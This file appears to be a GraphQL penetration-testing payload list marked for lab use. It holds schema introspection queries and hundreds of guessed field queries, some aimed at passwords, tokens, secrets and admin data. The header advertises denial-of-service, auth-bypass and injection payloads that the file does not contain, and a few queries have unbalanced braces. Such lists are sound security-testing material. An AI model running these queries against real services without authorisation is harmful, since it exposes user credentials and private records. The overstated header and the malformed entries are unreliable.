# payloads/web/graphql.txt
# GraphQL security test queries — AUTHORISED LAB USE ONLY
# Advanced pentester edition — comprehensive coverage across all attack vectors
# Includes introspection, N+1 denial of service, auth bypass, injection, and 2026-relevant techniques

# ── Basic introspection ──────────────────────────────────────
{"query":"{__typename}"}
{"query":"{__schema{types{name}}}"}
{"query":"{__schema{queryType{name}mutationType{name}subscriptionType{name}}}"}
{"query":"{__schema{types{name kind description fields{name type{name kind ofType{name kind ofType{name kind}}}}}}}"}
{"query":"{__schema{queryType{name}mutationType{name}types{name kind description fields{name description type{name kind ofType{name kind}}args{name type{name kind}}}inputFields{name type{name kind}}interfaces{name}enumValues{name}possibleTypes{name}}}"}
{"query":"{__schema{queryType{name}}}"}
{"query":"query{__schema{queryType{name}mutationType{name}types{name kind}}}"}
{"query":"query IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}
{"query":"{__type(name:\"Query\"){name fields{name type{name kind}}}}"}
{"query":"{__type(name:\"Mutation\"){name fields{name type{name kind}}}}"}
{"query":"{__type(name:\"Subscription\"){name fields{name type{name kind}}}}"}
{"query":"{__type(name:\"User\"){name fields{name type{name kind}}}}"}
{"query":"{__type(name:\"users\"){name fields{name type{name kind}}}}"}
{"query":"{__type(name:\"UserPayload\"){name fields{name type{name kind}}}}"}
{"query":"{__type(name:\"AuthPayload\"){name fields{name type{name kind}}}}"}
{"query":"{__type(name:\"LoginInput\"){name inputFields{name type{name kind}}}}"}

# ── Disabled introspection detection (still leak fields) ────
{"query":"{__typename}"}
{"query":"{__type(name:\"Query\"){name}}"}
{"query":"{__type(name:\"User\"){name}}"}
{"query":"query{__schema{queryType{name}}}"}
{"query":"query a{__schema{types{name}}}"}

# ── Query type name discovery ──────────────────────────────
{"query":"{__schema{queryType{name}}}"}
{"query":"{__schema{mutationType{name}}}"}
{"query":"{__schema{subscriptionType{name}}}"}

# ── Popular query fields (guessable) ────────────────────────
{"query":"{users{id}}"}
{"query":"{user(id:1){id}}"}
{"query":"{users{id username}}"}
{"query":"{user(id:1){id username}}"}
{"query":"{users{id username email}}"}
{"query":"{user(id:1){id username email}}"}
{"query":"{users{id name email password}}"}
{"query":"{user(id:1){id name email password}}"}
{"query":"{users{id username email password role}}"}
{"query":"{user(id:1){id username email password role}}"}
{"query":"{users{id name email password role token}}"}
{"query":"{user(id:1){id name email password role token}}"}
{"query":"{users{id username email password role isAdmin}}"}
{"query":"{user(id:1){id username email password role isAdmin}}"}
{"query":"{users{id username email password role admin}}"}
{"query":"{user(id:1){id username email password role admin}}"}
{"query":"{users{id username firstName lastName email password}}"}
{"query":"{user(id:1){id username firstName lastName email password}}"}
{"query":"{users{id username email phone address}}"}
{"query":"{user(id:1){id username email phone address}}"}
{"query":"{users{id username email createdAt updatedAt}}"}
{"query":"{user(id:1){id username email createdAt updatedAt}}"}
{"query":"{posts{id title body}}"}
{"query":"{post(id:1){id title body}}"}
{"query":"{posts{id title body author{id username}}}}"}
{"query":"{post(id:1){id title body author{id username}}}}"}
{"query":"{products{id name price}}"}
{"query":"{product(id:1){id name price}}"}
{"query":"{orders{id total status}}"}
{"query":"{order(id:1){id total status}}"}
{"query":"{profiles{id bio}}"}
{"query":"{profile(id:1){id bio}}"}
{"query":"{comments{id text}}"}
{"query":"{comment(id:1){id text}}"}
{"query":"{messages{id content}}"}
{"query":"{message(id:1){id content}}"}
{"query":"{tickets{id subject}}"}
{"query":"{ticket(id:1){id subject}}"}
{"query":"{items{id name}}"}
{"query":"{item(id:1){id name}}"}
{"query":"{articles{id title}}"}
{"query":"{article(id:1){id title}}"}
{"query":"{documents{id name}}"}
{"query":"{document(id:1){id name}}"}
{"query":"{pages{id title}}"}
{"query":"{page(id:1){id title}}"}
{"query":"{notifications{id message}}"}
{"query":"{notification(id:1){id message}}"}
{"query":"{tasks{id description}}"}
{"query":"{task(id:1){id description}}"}
{"query":"{events{id name}}"}
{"query":"{event(id:1){id name}}"}
{"query":"{projects{id name}}"}
{"query":"{project(id:1){id name}}"}
{"query":"{settings{id key}}"}
{"query":"{setting(id:1){id key}}"}
{"query":"{sessions{id token}}"}
{"query":"{session(id:1){id token}}"}
{"query":"{tokens{id accessToken}}"}
{"query":"{token(id:1){id accessToken}}"}
{"query":"{logs{id message}}"}
{"query":"{log(id:1){id message}}"}
{"query":"{configs{id key value}}"}
{"query":"{config(id:1){id key value}}"}
{"query":"{secrets{id value}}"}
{"query":"{secret(id:1){id value}}"}
{"query":"{keys{id publicKey}}"}
{"query":"{key(id:1){id publicKey}}"}
{"query":"{todos{id text}}"}
{"query":"{todo(id:1){id text}}"}
{"query":"{albums{id title}}"}
{"query":"{album(id:1){id title}}"}
{"query":"{photos{id url}}"}
{"query":"{photo(id:1){id url}}"}
{"query":"{videos{id url}}"}
{"query":"{video(id:1){id url}}"}
{"query":"{files{id url}}"}
{"query":"{file(id:1){id url}}"}
{"query":"{uploads{id filename}}"}
{"query":"{upload(id:1){id filename}}"}
{"query":"{categories{id name}}"}
{"query":"{category(id:1){id name}}"}
{"query":"{tags{id name}}"}
{"query":"{tag(id:1){id name}}"}
{"query":"{roles{id name}}"}
{"query":"{role(id:1){id name}}"}
{"query":"{permissions{id name}}"}
{"query":"{permission(id:1){id name}}"}
{"query":"{groups{id name}}"}
{"query":"{group(id:1){id name}}"}
{"query":"{teams{id name}}"}
{"query":"{team(id:1){id name}}"}
{"query":"{organizations{id name}}"}
{"query":"{organization(id:1){id name}}"}
{"query":"{companies{id name}}"}
{"query":"{company(id:1){id name}}"}
{"query":"{addresses{id street}}"}
{"query":"{address(id:1){id street}}"}
{"query":"{payments{id amount}}"}
{"query":"{payment(id:1){id amount}}"}
{"query":"{transactions{id amount}}"}
{"query":"{transaction(id:1){id amount}}"}
{"query":"{invoices{id total}}"}
{"query":"{invoice(id:1){id total}}"}
{"query":"{reports{id name}}"}
{"query":"{report(id:1){id name}}"}
{"query":"{analytics{id metric}}"}
{"query":"{analytic(id:1){id metric}}"}
{"query":"{widgets{id name}}"}
{"query":"{widget(id:1){id name}}"}
{"query":"{dashboards{id name}}"}
{"query":"{dashboard(id:1){id name}}"}
{"query":"{audits{id action}}"}
{"query":"{audit(id:1){id action}}"}
{"query":"{feedbacks{id rating}}"}
{"query":"{feedback(id:1){id rating}}"}
{"query":"{surveys{id title}}"}
{"query":"{survey(id:1){id title}}"}
{"query":"{ratings{id score}}"}
{"query":"{rating(id:1){id score}}"}
{"query":"{reviews{id text}}"}
{"query":"{review(id:1){id text}}"}
{"query":"{flags{id reason}}"}
{"query":"{flag(id:1){id reason}}"}
{"query":"{reports{id description}}"}
{"query":"{report(id:1){id description}}"}
{"query":"{alerts{id message}}"}
{"query":"{alert(id:1){id message}}"}
{"query":"{warnings{id message}}"}
{"query":"{warning(id:1){id message}}"}
{"query":"{errors{id message}}"}
{"query":"{error(id:1){id message}}"}
{"query":"{events{id type}}"}
{"query":"{event(id:1){id type}}"}
{"query":"{webhooks{id url}}"}
{"query":"{webhook(id:1){id url}}"}
{"query":"{hooks{id endpoint}}"}
{"query":"{hook(id:1){id endpoint}}"}
{"query":"{endpoints{id path}}"}
{"query":"{endpoint(id:1){id path}}"}
{"query":"{routes{id path}}"}
{"query":"{route(id:1){id path}}"}
{"query":"{sockets{id room}}"}
{"query":"{socket(id:1){id room}}"}
{"query":"{streams{id name}}"}
{"query":"{stream(id:1){id name}}"}
{"query":"{channels{id name}}"}
{"query":"{channel(id:1){id name}}"}
{"query":"{notifications{id type}}"}
{"query":"{notification(id:1){id type}}"}
{"query":"{pushTokens{id token}}"}
{"query":"{pushToken(id:1){id token}}"}
{"query":"{geolocations{id lat}}"}
{"query":"{geolocation(id:1){id lat}}"}
{"query":"{locations{id lat}}"}
{"query":"{location(id:1){id lat}}"}
{"query":"{places{id name}}"}
{"query":"{place(id:1){id name}}"}
{"query":"{checkins{id timestamp}}"}
{"query":"{checkin(id:1){id timestamp}}"}
{"query":"{visits{id count}}"}
{"query":"{visit(id:1){id count}}"}
{"query":"{clicks{id timestamp}}"}
{"query":"{click(id:1){id timestamp}}"}
{"query":"{impressions{id count}}"}
{"query":"{impression(id:1){id count}}"}
{"query":"{conversions{id value}}"}
{"query":"{conversion(id:1){id value}}"}
{"query":"{segments{id name}}"}
{"query":"{segment(id:1){id name}}"}
{"query":"{campaigns{id name}}"}
{"query":"{campaign(id:1){id name}}"}
{"query":"{newsletters{id subject}}"}
{"query":"{newsletter(id:1){id subject}}"}
{"query":"{templates{id name}}"}
{"query":"{template(id:1){id name}}"}
{"query":"{layouts{id name}}"}
{"query":"{layout(id:1){id name}}"}
{"query":"{themes{id name}}"}
{"query":"{theme(id:1){id name}}"}
{"query":"{widgets{id type}}"}
{"query":"{widget(id:1){id type}}"}
{"query":"{plugins{id name}}"}
{"query":"{plugin(id:1){id name}}"}
{"query":"{modules{id name}}"}
{"query":"{module(id:1){id name}}"}
{"query":"{extensions{id name}}"}
{"query":"{extension(id:1){id name}}"}
{"query":"{integrations{id name}}"}
{"query":"{integration(id:1){id name}}"}
{"query":"{providers{id name}}"}
{"query":"{provider(id:1){id name}}"}
{"query":"{connectors{id name}}"}
{"query":"{connector(id:1){id name}}"}
{"query":"{adapters{id name}}"}
{"query":"{adapter(id:1){id name}}"}
{"query":"{controllers{id name}}"}
{"query":"{controller(id:1){id name}}"}
{"query":"{resolvers{id name}}"}
{"query":"{resolver(id:1){id name}}"}
{"query":"{mutations{id name}}"}
{"query":"{mutation(id:1){id name}}"}
{"query":"{subscriptions{id name}}"}
{"query":"{subscription(id:1){id name}}"}
{"query":"{queries{id name}}"}
{"query":"{query(id:1){id name}}"}
{"query":"{fields{id name}}"}
{"query":"{field(id:1){id name}}"}
{"query":"{arguments{id name}}"}
{"query":"{argument(id:1){id name}}"}
{"query":"{variables{id name}}"}
{"query":"{variable(id:1){id name}}"}
{"query":"{types{id name}}"}
{"query":"{type(id:1){id name}}"}
{"query":"{interfaces{id name}}"}
{"query":"{interface(id:1){id name}}"}
{"query":"{unions{id name}}"}
{"query":"{union(id:1){id name}}"}
{"query":"{enums{id name}}"}
{"query":"{enum(id:1){id name}}"}
{"query":"{scalars{id name}}"}
{"query":"{scalar(id:1){id name}}"}
{"query":"{directives{id name}}"}
{"query":"{directive(id:1){id name}}"}
{"query":"{inputs{id name}}"}
{"query":"{input(id:1){id name}}"}
{"query":"{fragments{id name}}"}
{"query":"{fragment(id:1){id name}}"}
{"query":"{operations{id name}}"}
{"query":"{operation(id:1){id name}}"}
{"query":"{schema{id name}}"}
{"query":"{schema(id:1){id name}}"}
{"query":"{api{id version}}"}
{"query":"{api(id:1){id version}}"}
{"query":"{meta{id version}}"}
{"query":"{meta(id:1){id version}}"}
{"query":"{info{id version}}"}
{"query":"{info(id:1){id version}}"}
{"query":"{about{id version}}"}
{"query":"{about(id:1){id version}}"}
{"query":"{status{id health}}"}
{"query":"{status(id:1){id health}}"}
{"query":"{health{id status}}"}
{"query":"{health(id:1){id status}}"}
{"query":"{ping{id response}}"}
{"query":"{ping(id:1){id response}}"}
{"query":"{echo{id message}}"}
{"query":"{echo(id:1){id message}}"}
{"query":"{version{id number}}"}
{"query":"{version(id:1){id number}}"}
{"query":"{uptime{id seconds}}"}
{"query":"{uptime(id:1){id seconds}}"}
{"query":"{config{id name}}"}
{"query":"{config(id:1){id name}}"}
{"query":"{environment{id name}}"}
{"query":"{environment(id:1){id name}}"}
{"query":"{debug{id info}}"}
{"query":"{debug(id:1){id info}}"}
{"query":"{test{id result}}"}
{"query":"{test(id:1){id result}}"}
{"query":"{admin{id secret}}"}
{"query":"{admin(id:1){id secret}}"}
{"query":"{private{id data}}"}
{"query":"{private(id:1){id data}}"}
{"query":"{internal{id access}}"}
{"query":"{internal(id:1){id access}}"}
{"query":"{system{id status}}"}
{"query":"{system(id:1){id status}}"}
{"query":"{maintenance{id mode}}"}
{"query":"{maintenance(id:1){id mode}}"}
{"query":"{backup{id url}}"}
{"query":"{backup(id:1){id url}}"}
{"query":"{restore{id status}}"}
{"query":"{restore(id:1){id status}}"}
{"query":"{export{id url}}"}
{"query":"{export(id:1){id url}}"}
{"query":"{import{id status}}"}
{"query":"{import(id:1){id status}}"}
{"query":"{migrate{id status}}"}
{"query":"{migrate(id:1){id status}}"}
{"query":"{migration{id name}}"}
{"query":"{migration(id:1){id name}}"}
{"query":"{seed{id name}}"}
{"query":"{seed(id:1){id name}}"}
{"query":"{database{id name}}"}
{"query":"{database(id:1){id name}}"}
{"query":"{cache{id key}}"}
{"query":"{cache(id:1){id key}}"}
{"query":"{redis{id status}}"}
{"query":"{redis(id:1){id status}}"}
{"query":"{memcache{id status}}"}
{"query":"{memcache(id:1){id status}}"}
{"query":"{rabbitmq{id status}}"}
{"query":"{rabbitmq(id:1){id status}}"}
{"query":"{kafka{id status}}"}
{"query":"{kafka(id:1){id status}}"}
{"query":"{s3{id bucket}}"}
{"query":"{s3(id:1){id bucket}}"}
{"query":"{s3bucket{id name}}"}
{"query":"{s3bucket(id:1){id name}}"}
{"query":"{storage{id path}}"}
{"query":"{storage(id:1){id path}}"}
{"query":"{cdn{id url}}"}
{"query":"{cdn(id:1){id url}}"}
{"query":"{cdnUrl{id url}}"}
{"query":"{cdnUrl(id:1){id url}}"}
{"query":"{media{id url}}"}
{"query":"{media(id:1){id url}}"}
{"query":"{image{id url}}"}
{"query":"{image(id:1){id url}}"}
{"query":"{images{id url}}"}
{"query":"{images(id:1){id url}}"}
{"query":"{avatar{id url}}"}
{"query":"{avatar(id:1){id url}}"}
{"query":"{profilePic{id url}}"}
{"query":"{profilePic(id:1){id url}}"}
{"query":"{thumbnail{id url}}"}
{"query":"{thumbnail(id:1){id url}}"}
{"query":"{attachment{id url}}"}
{"query":"{attachment(id:1){id url}}"}
{"query":"{download{id url}}"}
{"query":"{download(id:1){id url}}"}
{"query":"{favicon{id url}}"}
{"query":"{favicon(id:1){id url}}"}
{"query":"{logo{id url}}"}
{"query":"{logo(id:1){id url}}"}
{"query":"{icon{id url}}"}
{"query":"{icon(id:1){id url}}"}
{"query":"{banner{id url}}"}
{"query":"{banner(id:1){id url}}"}
{"query":"{header{id url}}"}
{"query":"{header(id:1){id url}}"}
{"query":"{footer{id html}}"}
{"query":"{footer(id:1){id html}}"}
{"query":"{sidebar{id html}}"}
{"query":"{sidebar(id:1){id html}}"}
{"query":"{navigation{id items}}"}
{"query":"{navigation(id:1){id items}}"}
{"query":"{menu{id items}}"}
{"query":"{menu(id:1){id items}}"}
{"query":"{search{id results}}"}
{"query":"{search(id:1){id results}}"}
{"query":"{autocomplete{id suggestions}}"}
{"query":"{autocomplete(id:1){id suggestions}}"}
{"query":"{suggestions{id text}}"}
{"query":"{suggestion(id:1){id text}}"}
{"query":"{recommendations{id items}}"}
{"query":"{recommendation(id:1){id items}}"}
{"query":"{related{id items}}"}
{"query":"{related(id:1){id items}}"}
{"query":"{popular{id items}}"}
{"query":"{popular(id:1){id items}}"}
{"query":"{trending{id items}}"}
{"query":"{trending(id:1){id items}}"}
{"query":"{featured{id items}}"}
{"query":"{featured(id:1){id items}}"}
{"query":"{new{id items}}"}
{"query":"{new(id:1){id items}}"}
{"query":"{recent{id items}}"}
{"query":"{recent(id:1){id items}}"}
{"query":"{latest{id items}}"}
{"query":"{latest(id:1){id items}}"}
{"query":"{upcoming{id items}}"}
{"query":"{upcoming(id:1){id items}}"}
{"query":"{past{id items}}"}
{"query":"{past(id:1){id items}}"}
{"query":"{expired{id items}}"}
{"query":"{expired(id:1){id items}}"}
{"query":"{archived{id items}}"}
{"query":"{archived(id:1){id items}}"}
{"query":"{deleted{id items}}"}
{"query":"{deleted(id:1){id items}}"}
{"query":"{hidden{id items}}"}
{"query":"{hidden(id:1){id items}}"}
{"query":"{inactive{id items}}"}
{"query":"{inactive(id:1){id items}}"}
{"query":"{disabled{id items}}"}
{"query":"{disabled(id:1){id items}}"}
{"query":"{suspended{id items}}"}
{"query":"{suspended(id:1){id items}}"}
{"query":"{banned{id items}}"}
{"query":"{banned(id:1){id items}}"}
{"query":"{blocked{id items}}"}
{"query":"{blocked(id:1){id items}}"}
{"query":"{locked{id items}}"}
{"query":"{locked(id:1){id items}}"}
{"query":"{pending{id items}}"}
{"query":"{pending(id:1){id items}}"}
{"query":"{processing{id items}}"}
{"query":"{processing(id:1){id items}}"}
{"query":"{completed{id items}}"}
{"query":"{completed(id:1){id items}}"}
{"query":"{failed{id items}}"}
{"query":"{failed(id:1){id items}}"}
{"query":"{success{id items}}"}
{"query":"{success(id:1){id items}}"}
{"query":"{cancelled{id items}}"}
{"query":"{cancelled(id:1){id items}}"}
{"query":"{refunded{id items}}"}
{"query":"{refunded(id:1){id items}}"}
{"query":"{shipped{id items}}"}
{"query":"{shipped(id:1){id items}}"}
{"query":"{delivered{id items}}"}
{"query":"{delivered(id:1){id items}}"}
{"query":"{returned{id items}}"}
{"query":"{returned(id:1){id items}}"}
{"query":"{exchanged{id items}}"}
{"query":"{exchanged(id:1){id items}}"}
{"query":"{replaced{id items}}"}
{"query":"{replaced(id:1){id items}}"}
{"query":"{damaged{id items}}"}
{"query":"{damaged(id:1){id items}}"}
{"query":"{lost{id items}}"}
{"query":"{lost(id:1){id items}}"}
{"query":"{stolen{id items}}"}
{"query":"{stolen(id:1){id items}}"}
{"query":"{missing{id items}}"}
{"query":"{missing(id:1){id items}}"}
{"query":"{disputed{id items}}"}
{"query":"{disputed(id:1){id items}}"}
{"query":"{resolved{id items}}"}
{"query":"{resolved(id:1){id items}}"}
{"query":"{unresolved{id items}}"}
{"query":"{unresolved(id:1){id items}}"}
{"query":"{open{id items}}"}
{"query":"{open(id:1){id items}}"}
{"query":"{closed{id items}}"}
{"query":"{closed(id:1){id items}}"}
{"query":"{reopened{id items}}"}
{"query":"{reopened(id:1){id items}}"}
{"query":"{active{id items}}"}
{"query":"{active(id:1){id items}}"}
{"query":"{inactive{id items}}"}
{"query":"{inactive(id:1){id items}}"}
{"query":"{draft{id items}}"}
{"query":"{draft(id:1){id items}}"}
{"query":"{published{id items}}"}
{"query":"{published(id:1){id items}}"}
{"query":"{unpublished{id items}}"}
{"query":"{unpublished(id:1){id items}}"}
{"query":"{scheduled{id items}}"}
{"query":"{scheduled(id:1){id items}}"}
{"query":"{approved{id items}}"}
{"query":"{approved(id:1){id items}}"}
{"query":"{rejected{id items}}"}
{"query":"{rejected(id:1){id items}}"}
{"query":"{submitted{id items}}"}
{"query":"{submitted(id:1){id items}}"}
{"query":"{reviewed{id items}}"}
{"query":"{reviewed(id:1){id items}}"}
{"query":"{verified{id items}}"}
{"query":"{verified(id:1){id items}}"}
{"query":"{unverified{id items}}"}
{"query":"{unverified(id:1){id items}}"}
{"query":"{authenticated{id items}}"}
{"query":"{authenticated(id:1){id items}}"}
{"query":"{anonymous{id items}}"}
{"query":"{anonymous(id:1){id items}}"}
{"query":"{guest{id items}}"}
{"query":"{guest(id:1){id items}}"}
{"query":"{registered{id items}}"}
{"query":"{registered(id:1){id items}}"}
{"query":"{loggedIn{id items}}"}
{"query":"{loggedIn(id:1){id items}}"}
{"query":"{loggedOut{id items}}"}
{"query":"{loggedOut(id:1){id items}}"}
{"query":"{online{id items}}"}
{"query":"{online(id:1){id items}}"}
{"query":"{offline{id items}}"}
{"query":"{offline(id:1){id items}}"}
{"query":"{available{id items}}"}
{"query":"{available(id:1){id items}}"}
{"query":"{unavailable{id items}}"}
{"query":"{unavailable(id:1){id items}}"}
{"query":"{busy{id items}}"}
{"query":"{busy(id:1){id items}}"}
{"query":"{away{id items}}"}
{"query":"{away(id:1){id items}}"}
{"query":"{idle{id items}}"}
{"query":"{idle(id:1){id items}}"}
{"query":"{doNotDisturb{id items}}"}
{"query":"{doNotDisturb(id:1){id items}}"}
{"query":"{invisible{id items}}"}
{"query":"{invisible(id:1){id items}}"}
{"query":"{visible{id items}}"}
{"query":"{visible(id:1){id items}}"}
{"query":"{public{id items}}"}
{"query":"{public(id:1){id items}}"}
{"query":"{private{id items}}"}
{"query":"{private(id:1){id items}}"}
{"query":"{protected{id items}}"}
{"query":"{protected(id:1){id items}}"}
{"query":"{shared{id items}}"}
{"query":"{shared(id:1){id items}}"}
{"query":"{unshared{id items}}"}
{"query":"{unshared(id:1){id items}}"}
{"query":"{confidential{id items}}"}
{"query":"{confidential(id:1){id items}}"}
{"query":"{secret{id items}}"}
{"query":"{secret(id:1){id items}}"}
{"query":"{classified{id items}}"}
{"query":"{classified(id:1){id items}}"}
{"query":"{encrypted{id items}}"}
{"query":"{encrypted(id:1){id items}}"}
{"query":"{decrypted{id items}}"}
{"query":"{decrypted(id:1){id items}}"}
{"query":"{hashed{id items}}"}
{"query":"{hashed(id:1){id items}}"}
{"query":"{plaintext{id items}}"}
{"query":"{plaintext(id:1){id items}}"}
{"query":"{raw{id items}}"}
{"query":"{raw(id:1){id items}}"}
{"query":"{parsed{id items}}"}
{"query":"{parsed(id:1){id items}}"}
{"query":"{formatted{id items}}"}
{"query":"{formatted(id:1){id items}}"}
{"query":"{escaped{id items}}"}
{"query":"{escaped(id:1){id items}}"}
{"query":"{unescaped{id items}}"}
{"query":"{unescaped(id:1){id items}}"}
{"query":"{encoded{id items}}"}
{"query":"{encoded(id:1){id items}}"}
{"query":"{decoded{id items}}"}
{"query":"{decoded(id:1){id items}}"}
{"query":"{sanitized{id items}}"}
{"query":"{sanitized(id:1){id items}}"}
{"query":"{unsanitized{id items}}"}
{"query":"{unsanitized(id:1){id items}}"}
{"query":"{filtered{id items}}"}
{"query":"{filtered(id:1){id items}}"}
{"query":"{unfiltered{id items}}"}
{"query":"{unfiltered(id:1){id items}}"}
{"query":"{validated{id items}}"}
{"query":"{validated(id:1){id items}}"}
{"query":"{unvalidated{id items}}"}
{"query":"{unvalidated(id:1){id items}}"}
{"query":"{authorized{id items}}"}
{"query":"{authorized(id:1){id items}}"}
{"query":"{unauthorized{id items}}"}
{"query":"{unauthorized(id:1){id items}}"}
{"query":"{allowed{id items}}"}
{"query":"{allowed(id:1){id items}}"}
{"query":"{disallowed{id items}}"}
{"query":"{disallowed(id:1){id items}}"}
{"query":"{permitted{id items}}"}
{"query":"{permitted(id:1){id items}}"}
{"query":"{forbidden{id items}}"}
{"query":"{forbidden(id:1){id items}}"}
{"query":"{restricted{id items}}"}
{"query":"{restricted(id:1){id items}}"}
{"query":"{unrestricted{id items}}"}
{"query":"{unrestricted(id:1){id items}}"}
{"query":"{allowedRoles{id roles}}"}
{"query":"{allowedRoles(id:1){id roles}}"}
{"query":"{deniedRoles{id roles}}"}
{"query":"{deniedRoles(id:1){id roles}}"}
{"query":"{minimumRole{id role}}"}
{"query":"{minimumRole(id:1){id role}}"}
{"query":"{maximumRole{id role}}"}
{"query":"{maximumRole(id:1){id role}}"}
{"query":"{requiredRole{id role}}"}
{"query":"{requiredRole(id:1){id role}}"}
{"query":"{requiredPermission{id permission}}"}
{"query":"{requiredPermission(id:1){id permission}}"}
{"query":"{rateLimit{id max}}"}
{"query":"{rateLimit(id:1){id max}}"}
{"query":"{rateLimitPerMinute{id max}}"}
{"query":"{rateLimitPerMinute(id:1){id max}}"}
{"query":"{rateLimitPerHour{id max}}"}
{"query":"{rateLimitPerHour(id:1){id max}}"}
{"query":"{rateLimitPerDay{id max}}"}
{"query":"{rateLimitPerDay(id:1){id max}}"}
{"query":"{queryLimit{id max}}"}
{"query":"{queryLimit(id:1){id max}}"}
{"query":"{depthLimit{id max}}"}
{"query":"{depthLimit(id:1){id max}}"}
{"query":"{complexityLimit{id max}}"}
{"query":"{complexityLimit(id:1){id max}}"}
{"query":"{batchLimit{id max}}"}
{"query":"{batchLimit(id:1){id max}}"}
{"query":"{aliasLimit{id max}}"}
{"query":"{aliasLimit(id:1){id max}}"}
{"query":"{fragmentLimit{id max}}"}
{"query":"{fragmentLimit(id:1){id max}}"}
{"query":"{costLimit{id max}}"}
{"query":"{costLimit(id:1){id max}}"}
{"query":"{timeout{id seconds}}"}
{"query":"{timeout(id:1){id seconds}}"}
{"query":"{maxExecutionTime{id ms}}"}
{"query":"{maxExecutionTime(id:1){id ms}}"}
{"query":"{maxQueryLength{id chars}}"}
{"query":"{maxQueryLength(id:1){id chars}}"}
{"query":"{maxBatchSize{id count}}"}
{"query":"{maxBatchSize(id:1){id count}}"}
{"query":"{maxDepth{id count}}"}
{"query":"{maxDepth(id:1){id count}}"}
{"query":"{maxComplexity{id score}}"}
{"query":"{maxComplexity(id:1){id score}}"}
{"query":"{maxAliases{id count}}"}
{"query":"{maxAliases(id:1){id count}}"}
{"query":"{maxFragments{id count}}"}
{"query":"{maxFragments(id:1){id count}}"}
{"query":"{maxTokens{id count}}"}
{"query":"{maxTokens(id:1){id count}}"}
{"query":"{persistedQueries{id list}}"}
{"query":"{persistedQuery(id:1){id hash}}"}
{"query":"{whitelistedQueries{id list}}"}
{"query":"{whitelistedQuery(id:1){id name}}"}
{"query":"{blacklistedQueries{id list}}"}
{"query":"{blacklistedQuery(id:1){id name}}"}
{"query":"{trustedQueries{id list}}"}
{"query":"{trustedQuery(id:1){id name}}"}
{"query":"{knownQueries{id list}}"}
{"query":"{knownQuery(id:1){id name}}"}
{"query":"{cachedQueries{id list}}"}
{"query":"{cachedQuery(id:1){id name}}"}
{"query":"{savedQueries{id list}}"}
{"query":"{savedQuery(id:1){id name}}"}
{"query":"{favoriteQueries{id list}}"}
{"query":"{favoriteQuery(id:1){id name}}"}
{"query":"{recentQueries{id list}}"}
{"query":"{recentQuery(id:1){id name}}"}
{"query":"{history{id queries}}"}
{"query":"{history(id:1){id queries}}"}
{"query":"{logs{id entries}}"}
{"query":"{logs(id:1){id entries}}"}
{"query":"{analytics{id stats}}"}
{"query":"{analytics(id:1){id usage}}"}
{"query":"{metrics{id responseTime}}"}
{"query":"{metrics(id:1){id responseTime}}"}
{"query":"{performance{id avgMs}}"}
{"query":"{performance(id:1){id avgMs}}"}
{"query":"{latency{id p50}}"}
{"query":"{latency(id:1){id p50}}"}
{"query":"{throughput{id rps}}"}
{"query":"{throughput(id:1){id rps}}"}
{"query":"{errorRate{id percent}}"}
{"query":"{errorRate(id:1){id percent}}"}
{"query":"{successRate{id percent}}"}
{"query":"{successRate(id:1){id percent}}"}
{"query":"{uptimePercentage{id percent}}"}
{"query":"{uptimePercentage(id:1){id percent}}"}
{"query":"{downtime{id minutes}}"}
{"query":"{downtime(id:1){id minutes}}"}
{"query":"{availability{id percent}}"}
{"query":"{availability(id:1){id percent}}"}
{"query":"{reliability{id score}}"}
{"query":"{reliability(id:1){id score}}"}
{"query":"{securityScore{id score}}"}
{"query":"{securityScore(id:1){id score}}"}
{"query":"{compliance{id standards}}"}
{"query":"{compliance(id:1){id standards}}"}
{"query":"{auditLog{id entries}}"}
{"query":"{auditLog(id:1){id entries}}"}
{"query":"{accessLog{id entries}}"}
{"query":"{accessLog(id:1){id entries}}"}
{"query":"{errorLog{id entries}}"}
{"query":"{errorLog(id:1){id entries}}"}
{"query":"{debugLog{id entries}}"}
{"query":"{debugLog(id:1){id entries}}"}
{"query":"{warnLog{id entries}}"}
{"query":"{warnLog(id:1){id entries}}"}
{"query":"{infoLog{id entries}}"}
{"query":"{infoLog(id:1){id entries}}"}
{"query":"{traceLog{id entries}}"}
{"query":"{traceLog(id:1){id entries}}"}
{"query":"{eventLog{id entries}}"}
{"query":"{eventLog(id:1){id entries}}"}
{"query":"{systemLog{id entries}}"}
{"query":"{systemLog(id:1){id entries}}"}
{"query":"{applicationLog{id entries}}"}
{"query":"{applicationLog(id:1){id entries}}"}
{"query":"{serverLog{id entries}}"}
{"query":"{serverLog(id:1){id entries}}"}
{"query":"{requestLog{id entries}}"}
{"query":"{requestLog(id:1){id entries}}"}
{"query":"{responseLog{id entries}}"}
{"query":"{responseLog(id:1){id entries}}"}
{"query":"{apiLog{id entries}}"}
{"query":"{apiLog(id:1){id entries}}"}
{"query":"{databaseLog{id entries}}"}
{"query":"{databaseLog(id:1){id entries}}"}
{"query":"{cacheLog{id entries}}"}
{"query":"{cacheLog(id:1){id entries}}"}
{"query":"{authLog{id entries}}"}
{"query":"{authLog(id:1){id entries}}"}
{"query":"{securityLog{id entries}}"}
{"query":"{securityLog(id:1){id entries}}"}
{"query":"{webhookLog{id entries}}"}
{"query":"{webhookLog(id:1){id entries}}"}
{"query":"{integrationLog{id entries}}"}
{"query":"{integrationLog(id:1){id entries}}"}
